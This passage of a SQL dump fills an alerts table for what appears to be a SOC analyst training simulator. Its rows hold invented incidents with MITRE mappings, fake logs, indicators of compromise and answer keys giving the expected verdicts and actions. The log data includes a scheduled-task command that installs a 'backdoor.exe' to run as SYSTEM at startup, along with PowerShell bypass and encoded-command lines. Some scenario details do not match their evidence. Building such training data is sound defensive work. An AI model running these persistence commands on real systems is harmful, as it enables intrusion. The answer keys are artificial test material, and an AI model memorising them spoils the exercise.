script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1050, 'Execution of Malicious Scripts', 'critical', 'Endpoint Detection and Response (EDR)', 'Advanced Persistent Threat actors have executed scripts on compromised endpoints to extract sensitive data from Twitch\'s databases. The scripts targeted both source code and financial information.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"185.143.223.21\",\"destination_ip\":\"10.0.0.15\",\"user\":\"j.doe\",\"executed_command\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\j.doe\\\\extract_data.ps1\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"extract_data.ps1\",\"process_id\":4521,\"parent_process_id\":2500,\"detected_by\":\"EDR Agent v3.5\",\"action\":\"Execution\",\"event_description\":\"Suspicious PowerShell script executed to extract sensitive database information.\"}', '2026-01-24 00:33:47', '2026-02-16 17:49:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known data extraction 
script.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"extract_data.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Script used for unauthorized data extraction.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1051, 'Establishing Persistent Access', 'high', 'Log Monitoring', 'Anonymous (4chan) established persistent backdoors to ensure they could revisit and extract additional data if needed. The attackers used malicious scripts and tools to create unauthorized user accounts and install malware for persistent access.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:10Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"compromised_admin\",\"action\":\"Logon\",\"status\":\"Success\",\"file_created\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\",\"new_user_account\":{\"username\":\"sys_maintenance\",\"privilege\":\"Administrator\"},\"malicious_command\":\"schtasks /create /tn \\\"System Maintenance\\\" /tr \\\"C:\\\\Windows\\\\System32\\\\backdoor.exe\\\" /sc onstart /ru SYSTEM\"}', '2026-01-24 00:33:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a known backdoor malware\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual logon activity 
detected\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1052, 'Lateral Movement Across Systems', 'high', 'User Activity Monitoring', 'The attackers moved laterally within Twitch\'s infrastructure to find and access high-value data, increasing the potential impact of the breach.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:36Z\",\"event_id\":\"4624\",\"user\":\"jdoe_admin\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.0.0.45\",\"file_transferred\":\"C:\\\\Windows\\\\Temp\\\\APT_tool_v2.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.5\",\"activity\":\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\"}', '2026-01-24 00:33:47', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network log\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network log\",\"verdict\":\"internal\",\"details\":\"Internal destination IP address during lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the APT tool used.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"External attacker IP involved in the breach.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"user activity logs\",\"verdict\":\"suspicious\",\"details\":\"Compromised administrator credentials used in lateral 
movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1053, 'Massive Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'An expert-level threat actor has successfully exfiltrated 125GB of sensitive data, including source code and financial earnings, to an external server. The data was later publicly released, underscoring the seriousness of the breach.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-02T14:45:00Z\",\"event_id\":\"DLP-EXFIL-2023-1002\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"filename\":\"SensitiveDataArchive.zip\",\"file_size\":\"125GB\",\"hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"protocol\":\"HTTPS\",\"action\":\"exfiltrated\",\"external_server_domain\":\"maliciousserver.com\"}', '2026-01-24 00:33:47', '2026-02-16 17:49:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal source IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"Hash relates to a file previously flagged in suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"SensitiveDataArchive.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Filename resembles known patterns used in data 
theft.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"maliciousserver.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Domain used for unauthorized data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1054, 'Unauthorized Login Attempt Detected', 'medium', 'SIEM logs', 'An unauthorized login attempt was detected using credentials associated with an employee. The source of the login attempt is traced back to an IP address not recognized as part of the typical network traffic, indicating potential credential compromise through phishing.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:42:17Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"source_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"target_domain\":\"corp.godaddy.com\",\"status\":\"Failed\",\"failure_reason\":\"Account currently disabled\",\"internal_ip\":\"10.10.15.23\",\"log_source\":\"Windows Security Log\",\"event_description\":\"An account failed to log on.\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple unauthorized login attempts globally.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee account used within GoDaddy.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security 